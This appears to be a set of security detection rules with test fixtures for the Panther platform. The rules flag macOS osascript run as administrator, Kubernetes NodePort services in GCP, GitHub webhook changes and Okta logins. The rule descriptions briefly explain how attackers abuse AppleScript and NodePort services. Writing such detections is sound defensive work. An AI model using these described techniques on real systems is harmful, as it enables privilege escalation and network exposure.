                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Win",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": ["1234abcdefghijklmnop", "5a29b1ee210395604829dafd744a8039", "abcde098654321xyz"],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    RuleTest(
        name="Ran Osacompile with administrator privileges",
        expected_result=False,
        log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osacompile test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osacompile",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "ProcessRollup2",
            "fdr_event_type": "ProcessRollup2",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": ["1234abcdefghijklmnop", "5a29b1ee210395604829dafd744a8039", "abcde098654321xyz"],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
    RuleTest(
        name="Non Process event",
        expected_result=False,
        log={
            "aid": "1234abcdefghijklmnop",
            "aip": "1.2.3.4",
            "cid": "abcde098654321xyz",
            "configbuild": "1007.4.0016804.11",
            "configstatehash": "1260279761",
            "entitlements": "15",
            "event": {
                "CodeSigningFlags": "570506001",
                "CommandLine": "osascript test.osa with administrator privileges",
                "ConfigBuild": "1007.4.0016804.11",
                "ConfigStateHash": "1260279761",
                "EffectiveTransmissionClass": "2",
                "Entitlements": "15",
                "GID": "20",
                "ImageFileName": "/usr/bin/osascript",
                "MD5HashData": "5a29b1ee210395604829dafd744a8039",
                "MachOSubType": "1",
                "ParentBaseFileName": "zsh",
                "ParentProcessId": "488592041865603507",
                "ProcessEndTime": "",
                "ProcessGroupId": "488638905187012012",
                "ProcessStartTime": "1685123957.068",
                "RGID": "501",
                "RUID": "501",
                "RawProcessId": "51673",
                "SHA1HashData": "0000000000000000000000000000000000000000",
                "SHA256HashData": "fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de",
                "SVGID": "20",
                "SVUID": "501",
                "SessionProcessId": "488592041748162994",
                "SigningId": "com.apple.Foundation.plutil",
                "SourceProcessId": "488592041865603507",
                "SourceThreadId": "0",
                "Tags": "316",
                "TargetProcessId": "488638905187012012",
                "TeamId": "-",
                "UID": "501",
                "aid": "1234abcdefghijklmnop",
                "aip": "1.2.3.4",
                "cid": "abcde098654321xyz",
                "event_platform": "Mac",
                "event_simpleName": "ProcessRollup2",
                "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
                "name": "ProcessRollup2MacV9",
                "timestamp": "1685123957235",
            },
            "event_platform": "Mac",
            "event_simplename": "DnsRequest",
            "fdr_event_type": "DnsRequest",
            "id": "59c9d5fb-b9b7-43a3-913f-6df72d9e1969",
            "name": "ProcessRollup2MacV9",
            "p_any_ip_addresses": ["1.2.3.4"],
            "p_any_md5_hashes": ["1234abcdefghijklmnop", "5a29b1ee210395604829dafd744a8039", "abcde098654321xyz"],
            "p_any_sha1_hashes": ["0000000000000000000000000000000000000000"],
            "p_any_sha256_hashes": ["fc708414b7e7c0df8d7711d0362b4dbd79a45fba65bdc646848fa8f50e9035de"],
            "p_any_trace_ids": ["1234abcdefghijklmnop", "abcde098654321xyz"],
            "p_event_time": "2023-05-26 17:59:17.235",
            "p_log_type": "Crowdstrike.FDREvent",
            "p_parse_time": "2023-05-26 18:11:03.404",
            "p_row_id": "d6ff1555b3f6e785b3e2bbb218abf524",
            "p_schema_version": 0,
            "p_source_id": "e4962678-a986-44af-a757-18163a2bc963",
            "p_source_label": "Crowdstrike",
            "timestamp": "2023-05-26 17:59:17.235",
        },
    ),
]


@panther_managed
class CrowdstrikeMacosOsascriptAdministrator(Rule):
    display_name = "CrowdStrike MacOS Osascript as Administrator"
    default_description = "Detects usage of osascript with administrator privileges"
    id = "Crowdstrike.Macos.Osascript.Administrator-prototype"
    default_reference = "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/"
    default_severity = Severity.MEDIUM
    log_types = [LogType.CROWDSTRIKE_FDR_EVENT]
    tests = crowdstrike_macos_osascript_administrator_tests

    def rule(self, event):
        event_platform = event.deep_get("event_platform", default="<UNKNOWN_PLATFORM>")
        event_simplename = event.deep_get("event_simplename", default="<UNKNOWN_EVENT_SIMPLENAME>")
        image_filename = event.deep_get("event", "ImageFileName", default="<UNKNOWN_IMAGE_FILE_NAME>")
        command_line = event.deep_get("event", "CommandLine", default="<UNKNOWN_COMMAND_LINE>")
        return all(
            [
                event_platform == "Mac",
                event_simplename == "ProcessRollup2",
                image_filename == "/usr/bin/osascript",
                "with administrator privileges" in command_line,
            ],
        )

    def title(self, event):
        aid = event.get("aid", "<UNKNOWN_AID>")
        return f"Crowdstrike: Osascript run with administrator privileges on [{aid}]"

    def alert_context(self, event):
        return crowdstrike_process_alert_context(event)



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed
from pypanther.helpers.gcp_base_helpers import gcp_alert_context
from pypanther.helpers.panther_base_helpers import deep_get, deep_walk

gcpk8_s_service_type_node_port_deployed_tests: list[RuleTest] = [
    RuleTest(
        name="Service Created",
        expected_result=True,
        log={
            "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "some.user@company.com"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "io.k8s.core.v1.services.create",
                        "resource": "core/v1/namespaces/default/services/test-ns",
                    },
                ],
                "methodName": "io.k8s.core.v1.services.create",
                "request": {
                    "@type": "core.k8s.io/v1.Service",
                    "apiVersion": "v1",
                    "kind": "Service",
                    "spec": {
                        "ports": [{"name": "5678-8080", "port": 5678, "protocol": "TCP", "targetPort": 8080}],
                        "type": "NodePort",
                    },
                },
                "requestMetadata": {
                    "callerIP": "1.2.3.4",
                    "callerSuppliedUserAgent": "kubectl/v1.28.2 (darwin/amd64) kubernetes/89a4ea3",
                },
                "resourceName": "core/v1/namespaces/default/services/test-ns",
                "response": {
                    "@type": "core.k8s.io/v1.Service",
                    "apiVersion": "v1",
                    "kind": "Service",
                    "metadata": {
                        "creationTimestamp": "2024-02-19T12:02:21Z",
                        "name": "test-ns",
                        "namespace": "default",
                        "resourceVersion": "15036073",
                        "uid": "28758fe1-534a-4705-bcc2-12eeac6f11a4",
                    },
                    "spec": {
                        "clusterIP": "2.3.4.5",
                        "clusterIPs": ["2.3.4.5"],
                        "ports": [
                            {
                                "name": "5678-8080",
                                "nodePort": 32361,
                                "port": 5678,
                                "protocol": "TCP",
                                "targetPort": 8080,
                            },
                        ],
                        "type": "NodePort",
                    },
                },
                "serviceName": "k8s.io",
                "status": {},
            },
            "receiveTimestamp": "2024-02-19 12:02:39.542633547",
            "resource": {
                "labels": {
                    "cluster_name": "some-project-cluster",
                    "location": "us-west1",
                    "project_id": "some-project",
                },
                "type": "k8s_cluster",
            },
            "timestamp": "2024-02-19 12:02:22.057586000",
        },
    ),
    RuleTest(
        name="Error Creating Service",
        expected_result=False,
        log={
            "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "some.user@company.com"},
                "authorizationInfo": [
                    {
                        "granted": True,
                        "permission": "io.k8s.core.v1.services.create",
                        "resource": "core/v1/namespaces/default/services/test-ns",
                    },
                ],
                "methodName": "io.k8s.core.v1.services.create",
                "request": {
                    "@type": "core.k8s.io/v1.Service",
                    "apiVersion": "v1",
                    "kind": "Service",
                    "spec": {
                        "ports": [{"name": "5678-8080", "port": 5678, "protocol": "TCP", "targetPort": 8080}],
                        "type": "NodePort",
                    },
                },
                "requestMetadata": {
                    "callerIP": "1.2.3.4",
                    "callerSuppliedUserAgent": "kubectl/v1.28.2 (darwin/amd64) kubernetes/89a4ea3",
                },
                "resourceName": "core/v1/namespaces/default/services/test-ns",
                "response": {
                    "@type": "core.k8s.io/v1.Status",
                    "apiVersion": "v1",
                    "code": 409,
                    "details": {"kind": "services", "name": "test-ns"},
                    "kind": "Status",
                    "message": 'services "test-ns" already exists',
                    "metadata": {},
                    "reason": "AlreadyExists",
                    "status": "Failure",
                },
                "serviceName": "k8s.io",
                "status": {"code": 10, "message": 'services "test-ns" already exists'},
            },
            "receiveTimestamp": "2024-02-20 13:47:46.955496128",
            "resource": {
                "labels": {
                    "cluster_name": "some-project-cluster",
                    "location": "us-west1",
                    "project_id": "some-project",
                },
                "type": "k8s_cluster",
            },
            "timestamp": "2024-02-20 13:47:43.126037000",
        },
    ),
    RuleTest(
        name="No Permission Granted",
        expected_result=False,
        log={
            "logName": "projects/some-project/logs/cloudaudit.googleapis.com%2Factivity",
            "protoPayload": {
                "at_sign_type": "type.googleapis.com/google.cloud.audit.AuditLog",
                "authenticationInfo": {"principalEmail": "some.user@company.com"},
                "authorizationInfo": [
                    {
                        "granted": False,
                        "permission": "io.k8s.core.v1.services.create",
                        "resource": "core/v1/namespaces/default/services/test-ns",
                    },
                ],
                "methodName": "io.k8s.core.v1.services.create",
                "request": {
                    "@type": "core.k8s.io/v1.Service",
                    "apiVersion": "v1",
                    "kind": "Service",
                    "spec": {
                        "ports": [{"name": "5678-8080", "port": 5678, "protocol": "TCP", "targetPort": 8080}],
                        "type": "NodePort",
                    },
                },
                "requestMetadata": {
                    "callerIP": "1.2.3.4",
                    "callerSuppliedUserAgent": "kubectl/v1.28.2 (darwin/amd64) kubernetes/89a4ea3",
                },
                "resourceName": "core/v1/namespaces/default/services/test-ns",
                "spec": {
                    "clusterIP": "2.3.4.5",
                    "clusterIPs": ["2.3.4.5"],
                    "externalTrafficPolicy": "Cluster",
                    "internalTrafficPolicy": "Cluster",
                    "ipFamilies": ["IPv4"],
                    "ipFamilyPolicy": "SingleStack",
                    "ports": [
                        {"name": "5678-8080", "nodePort": 32361, "port": 5678, "protocol": "TCP", "targetPort": 8080},
                    ],
                    "type": "NodePort",
                },
            },
            "serviceName": "k8s.io",
            "status": {},
            "receiveTimestamp": "2024-02-19 12:02:39.542633547",
            "resource": {
                "labels": {
                    "cluster_name": "some-project-cluster",
                    "location": "us-west1",
                    "project_id": "some-project",
                },
                "type": "k8s_cluster",
            },
            "timestamp": "2024-02-19 12:02:22.057586000",
        },
    ),
]


@panther_managed
class GCPK8SServiceTypeNodePortDeployed(Rule):
    id = "GCP.K8S.Service.Type.NodePort.Deployed-prototype"
    display_name = "GCP K8S Service Type NodePort Deployed"
    log_types = [LogType.GCP_AUDIT_LOG]
    default_severity = Severity.HIGH
    default_description = "This detection monitors for any kubernetes service deployed with type node port. A Node Port service allows an attacker to expose a set of pods hosting the service to the internet by opening their port and redirecting traffic here. This can be used to bypass network controls and intercept traffic, creating a direct line to the outside network.\n"
    default_runbook = "Investigate the reason of creating NodePort service. Advise that it is discouraged practice. Create ticket if appropriate.\n"
    default_reference = "https://kubernetes.io/docs/tutorials/kubernetes-basics/expose/expose-intro/"
    reports = {"MITRE ATT&CK": ["T1190"]}
    tests = gcpk8_s_service_type_node_port_deployed_tests

    def rule(self, event):
        if deep_get(event, "protoPayload", "response", "status") == "Failure":
            return False
        if deep_get(event, "protoPayload", "methodName") != "io.k8s.core.v1.services.create":
            return False
        if deep_get(event, "protoPayload", "request", "spec", "type") != "NodePort":
            return False
        authorization_info = deep_walk(event, "protoPayload", "authorizationInfo")
        if not authorization_info:
            return False
        for auth in authorization_info:
            if auth.get("permission") == "io.k8s.core.v1.services.create" and auth.get("granted") is True:
                return True
        return False

    def title(self, event):
        actor = deep_get(event, "protoPayload", "authenticationInfo", "principalEmail", default="<ACTOR_NOT_FOUND>")
        project_id = deep_get(event, "resource", "labels", "project_id", default="<PROJECT_NOT_FOUND>")
        return f"[GCP]: [{actor}] created NodePort service in project [{project_id}]"

    def alert_context(self, event):
        context = gcp_alert_context(event)
        request_spec = deep_walk(event, "protoPayload", "request", "spec")
        context["request_spec"] = request_spec
        return context



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed

git_hub_repo_hook_modified_tests: list[RuleTest] = [
    RuleTest(
        name="GitHub - Webhook Created",
        expected_result=True,
        log={
            "actor": "cat",
            "action": "hook.create",
            "data": {"hook_id": 111222333444555, "events": ["fork", "public", "pull_request", "push", "repository"]},
            "org": "my-org",
            "p_log_type": "GitHub.Audit",
            "repository": "my-org/my-repo",
        },
    ),
    RuleTest(
        name="GitHub - Webhook Deleted",
        expected_result=True,
        log={
            "actor": "cat",
            "action": "hook.destroy",
            "data": {"hook_id": 111222333444555, "events": ["fork", "public", "pull_request", "push", "repository"]},
            "org": "my-org",
            "p_log_type": "GitHub.Audit",
            "repository": "my-org/my-repo",
        },
    ),
    RuleTest(
        name="GitHub - Non Webhook Event",
        expected_result=False,
        log={
            "actor": "cat",
            "action": "org.invite_member",
            "org": "my-org",
            "p_log_type": "GitHub.Audit",
            "repository": "my-org/my-repo",
        },
    ),
]


@panther_managed
class GitHubRepoHookModified(Rule):
    id = "GitHub.Repo.HookModified-prototype"
    display_name = "GitHub Web Hook Modified"
    log_types = [LogType.GITHUB_AUDIT]
    tags = ["GitHub", "Exfiltration:Automated Exfiltration"]
    reports = {"MITRE ATT&CK": ["TA0010:T1020"]}
    default_reference = "https://docs.github.com/en/webhooks/about-webhooks"
    default_severity = Severity.INFO
    default_description = "Detects when a web hook is added, modified, or deleted in an org repository."
    tests = git_hub_repo_hook_modified_tests

    def rule(self, event):
        return event.get("action").startswith("hook.")

    def title(self, event):
        action = "modified"
        if event.get("action").endswith("destroy"):
            action = "deleted"
        elif event.get("action").endswith("create"):
            action = "created"
        return f"web hook {action} in repository [{event.get('repo', '<UNKNOWN_REPO>')}]"

    def severity(self, event):
        if event.get("action").endswith("create"):
            return "MEDIUM"
        return "INFO"



from enum import Enum
from functools import total_ordering


@total_ordering
class Severity(str, Enum):
    INFO = "INFO"
    LOW = "LOW"
    MEDIUM = "MEDIUM"
    HIGH = "HIGH"
    CRITICAL = "CRITICAL"

    def __lt__(self, other):
        return Severity.as_int(self.value) < Severity.as_int(other.value)

    @staticmethod
    def as_int(value: "Severity") -> int:
        val = value.upper()
        if val == Severity.INFO:
            return 0
        if val == Severity.LOW:
            return 1
        if val == Severity.MEDIUM:
            return 2
        if val == Severity.HIGH:
            return 3
        if val == Severity.CRITICAL:
            return 4
        raise ValueError(f"Unknown severity: {value}")

    def __str__(self) -> str:
        """Returns a string representation of the class' value."""
        return self.value


# Used to check dynamic severity output
SEVERITY_DEFAULT = "DEFAULT"
SEVERITY_TYPES = [str(sev) for sev in Severity]



from pypanther import LogType, Rule, RuleTest, Severity, panther_managed

okta_login_success_tests: list[RuleTest] = [
    RuleTest(
        name="Non-Login Event",
        expected_result=False,
        log={
            "actor": {
                "alternateId": "jim.kalafut@panther.com",
                "displayName": "Jim Kalafut",
                "id": "00u99ped55av2JpGs5d7",
                "type": "User",
            },
            "authenticationContext": {"authenticationStep": 0, "externalSessionId": "trsxcsf59kYRG-GwAbWjw-PZA"},
            "client": {
                "device": "Unknown",
                "ipAddress": "11.22.33.44",
                "userAgent": {"browser": "UNKNOWN", "os": "Unknown", "rawUserAgent": "Go-http-client/2.0"},
                "zone": "null",
            },
            "debugContext": {
                "debugData": {
                    "dtHash": "53dd1a7513e0256eb13b9a47bb07ed61e8ca3d35fbdc36c909567a21a65a2b19",
                    "rateLimitBucketUuid": "b192d91c-b242-36da-9332-d97a5579f865",
                    "rateLimitScopeType": "ORG",
                    "rateLimitSecondsToReset": "6",
                    "requestId": "234cf34e0081e025e1fe14224464bbd6",
                    "requestUri": "/api/v1/logs",
                    "threshold": "20",
                    "timeSpan": "1",
                    "timeUnit": "MINUTES",
                    "url": "/api/v1/logs?since=2023-09-21T17%3A04%3A22Z&limit=1000&after=1714675441520_1",
                    "userId": "00u99ped55av2JpGs5d7",
                    "warningPercent": "60",
                },
            },
            "displayMessage": "Rate limit warning",
            "eventType": "system.org.rate_limit.warning",
            "legacyEventType": "core.framework.ratelimit.warning",
            "outcome": {"result": "SUCCESS"},
            "published": "2024-05-02 18:46:21.121000000",
            "request": {"ipChain": [{"ip": "11.22.33.44", "version": "V4"}]},
            "securityContext": {},
            "severity": "WARN",
            "target": [
                {"id": "/api/v1/logs", "type": "URL Pattern"},
                {"id": "b192d91c-b242-36da-9332-d97a5579f865", "type": "Bucket Uuid"},
            ],
            "transaction": {
                "detail": {"requestApiTokenId": "00T1bjatrp6Nl1dOc5d7"},
                "id": "234cf34e0081e025e1fe14224464bbd6",
                "type": "WEB",
            },
            "uuid": "44aeb388-08b4-11ef-9cec-73ffcb6f9fdd",
            "version": "0",
        },
    ),
    RuleTest(
        name="Successful Login",
        expected_result=True,
        log={
            "actor": {
                "alternateId": "casey.hill@hey.com",
                "displayName": "Casey Hill",
                "id": "00ubewfku1EX0WCFk697",
                "type": "User",
            },
            "authenticationContext": {"authenticationStep": 0, "externalSessionId": "idxvF50v_5sT2-GOA7_K0Amyw"},
            "client": {
                "device": "Computer",
                "geographicalContext": {
                    "city": "Atlanta",
                    "country": "United States",
                    "geolocation": {"lat": 33.9794, "lon": -84.3459},
                    "postalCode": "30350",
                    "state": "Georgia",
                },
                "ipAddress": "99.108.5.25",
                "userAgent": {
                    "browser": "CHROME",
                    "os": "Mac OS 14.4.1 (Sonoma)",
                    "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
                },
                "zone": "null",
            },
            "debugContext": {
                "debugData": {
                    "authnRequestId": "5167029d2c8308348d651c0be650230f",
                    "dtHash": "f23be3b6d8bfd69c14e0d1b33e790b84fa5358eab0a09a1058816ad65d633da4",
                    "oktaUserAgentExtended": "okta-auth-js/7.0.1 okta-signin-widget-7.16.1",
                    "origin": "https://trial-2340039.okta.com",
                    "requestId": "601b158a3b3e23be5bbf74d0fe63cd78",
                    "requestUri": "/idp/idx/challenge/answer",
                    "threatSuspected": "false",
                    "url": "/idp/idx/challenge/answer?",
                },
            },
            "displayMessage": "User login to Okta",
            "eventType": "user.session.start",
            "legacyEventType": "core.user_auth.login_success",
            "outcome": {"result": "SUCCESS"},
            "published": "2024-04-02 19:17:37.621000000",
            "request": {
                "ipChain": [
                    {
                        "geographicalContext": {
                            "city": "Atlanta",
                            "country": "United States",
                            "geolocation": {"lat": 33.9794, "lon": -84.3459},
                            "postalCode": "30350",
                            "state": "Georgia",
                        },
                        "ip": "99.108.5.25",
                        "version": "V4",
                    },
                ],
            },
            "securityContext": {
                "asNumber": 7018,
                "asOrg": "at&t corp.",
                "domain": "sbcglobal.net",
                "isProxy": False,
                "isp": "att services inc",
            },
            "severity": "INFO",
            "target": [
                {
                    "alternateId": "unknown",
                    "displayName": "Password",
                    "id": "lae1at5k3ir9bV1gr697",
                    "type": "AuthenticatorEnrollment",
                },
                {
                    "alternateId": "Okta Dashboard",
                    "displayName": "Okta Dashboard",
                    "id": "0oabewfkt83T8ve1o697",
                    "type": "AppInstance",
                },
            ],
            "transaction": {"detail": {}, "id": "601b158a3b3e23be5bbf74d0fe63cd78", "type": "WEB"},
            "uuid": "aac560bd-f125-11ee-9caa-cd5d09945def",
            "version": "0",
        },
    ),
    RuleTest(
        name="Failed Login",
        expected_result=False,
        log={
            "actor": {
                "alternateId": "casey.hill@hey.com",
                "displayName": "Casey Hill",
                "id": "00ubewfku1EX0WCFk697",
                "type": "User",
            },
            "authenticationContext": {"authenticationStep": 0, "externalSessionId": "idxvF50v_5sT2-GOA7_K0Amyw"},
            "client": {
                "device": "Computer",
                "geographicalContext": {
                    "city": "Atlanta",
                    "country": "United States",
                    "geolocation": {"lat": 33.9794, "lon": -84.3459},
                    "postalCode": "30350",
                    "state": "Georgia",
                },
                "ipAddress": "99.108.5.25",
                "userAgent": {
                    "browser": "CHROME",
                    "os": "Mac OS 14.4.1 (Sonoma)",
                    "rawUserAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
                },
                "zone": "null",
            },
            "debugContext": {
                "debugData": {
                    "authnRequestId": "5167029d2c8308348d651c0be650230f",
                    "dtHash": "f23be3b6d8bfd69c14e0d1b33e790b84fa5358eab0a09a1058816ad65d633da4",
                    "oktaUserAgentExtended": "okta-auth-js/7.0.1 okta-signin-widget-7.16.1",
                    "origin": "https://trial-2340039.okta.com",
                    "requestId": "601b158a3b3e23be5bbf74d0fe63cd78",
                    "requestUri": "/idp/idx/challenge/answer",
                    "threatSuspected": "false",
                    "url": "/idp/idx/challenge/answer?",
                },
            },
            "displayMessage": "User login to Okta",
            "eventType": "user.session.start",
            "legacyEventType": "core.user_auth.login_success",
            "outcome": {"result": "FAILURE"},
            "published": "2024-04-02 19:17:37.621000000",
            "request": {
                "ipChain": [
                    {
                        "geographicalContext": {
                            "city": "Atlanta",
                            "country": "United States",
                            "geolocation": {"lat": 33.9794, "lon": -84.3459},
                            "postalCode": "30350",
                            "state": "Georgia",
                        },
                        "ip": "99.108.5.25",
                        "version": "V4",
                    },
                ],
            },
            "securityContext": {
                "asNumber": 7018,
                "asOrg": "at&t corp.",
                "domain": "sbcglobal.net",
                "isProxy": False,
                "isp": "att services inc",
            },
            "severity": "INFO",
            "target": [
                {
                    "alternateId": "unknown",
                    "displayName": "Password",
                    "id": "lae1at5k3ir9bV1gr697",
                    "type": "AuthenticatorEnrollment",
                },
                {
                    "alternateId": "Okta Dashboard",
                    "displayName": "Okta Dashboard",
                    "id": "0oabewfkt83T8ve1o697",
                    "type": "AppInstance",
                },
            ],
            "transaction": {"detail": {}, "id": "601b158a3b3e23be5bbf74d0fe63cd78", "type": "WEB"},
            "uuid": "aac560bd-f125-11ee-9caa-cd5d09945def",
            "version": "0",
        },
    ),
]


@panther_managed
class OktaLoginSuccess(Rule):
    id = "Okta.Login.Success-prototype"
    display_name = "Okta Login Signal"
    enabled = False
    create_alert = False
    log_types = [LogType.OKTA_SYSTEM_LOG]
    default_severity = Severity.INFO
    tests = okta_login_success_tests

    def rule(self, event):
        return event.deep_get("eventType") == "user.session.start" and event.deep_get("outcome", "result") == "SUCCESS"

    def title(self, event):
        return f"{event.deep_get('actor', 'displayName')} logged in to Okta"
